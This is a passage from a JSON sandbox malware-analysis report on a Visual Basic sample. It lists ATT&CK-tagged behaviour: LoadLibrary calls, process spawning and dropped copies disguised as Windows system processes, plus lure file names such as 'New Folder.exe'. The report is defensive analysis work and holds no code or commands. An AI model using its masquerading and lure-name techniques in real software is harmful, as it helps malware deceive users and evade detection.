\"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004308)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004308)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003916)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003360)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002380)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002380)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006140)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006140)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006120)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006120)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006120)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006120)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006120)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006120)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003976)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003976)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003976)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003976)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003976)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003976)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002060)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002060)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003668)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004300)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004300)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003000)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003000)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003000)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003000)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003000)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003000)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001772)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001772)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001772)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001772)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001772)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001772)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002272)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002272)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001440)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000944)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000944)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000944)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000944)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000944)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003856)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003640)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003640)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001620)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001620)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001620)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002628)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002628)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002628)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002628)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002628)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002628)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002628)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002628)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003672)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003672)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003224)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003224)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002228)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002228)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002228)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002228)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002228)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002228)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003120)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003120)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003120)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D40000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D40000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D40000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D40000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D40000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D40000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D40000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76D40000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005972)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006136)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003264)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005852)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004272)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006072)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004132)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003964)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004124)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004340)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003836)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002164)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002428)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003016)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003628)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004068)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003096)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004088)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003756)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004308)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003916)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003360)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002380)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006140)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006120)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"D3_08.exe\" (UID: 00000000-00005972) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"D3_08.exe\" (UID: 00000000-00005972) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"D3_08.exe\" (UID: 00000000-00005972)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006136)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003264)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005852)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004272)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006072)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004132)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003964)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004124)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004340)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003836)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002164)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002428)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003016)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003628)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004068)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003096)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004088)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003756)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004308)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003916)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003360)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002380)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006140)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006120)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE506D.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE506D.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67EE4741.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67EE4741.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE5073.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE5073.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4745.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4745.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67EE4E36.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67EE4E36.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": 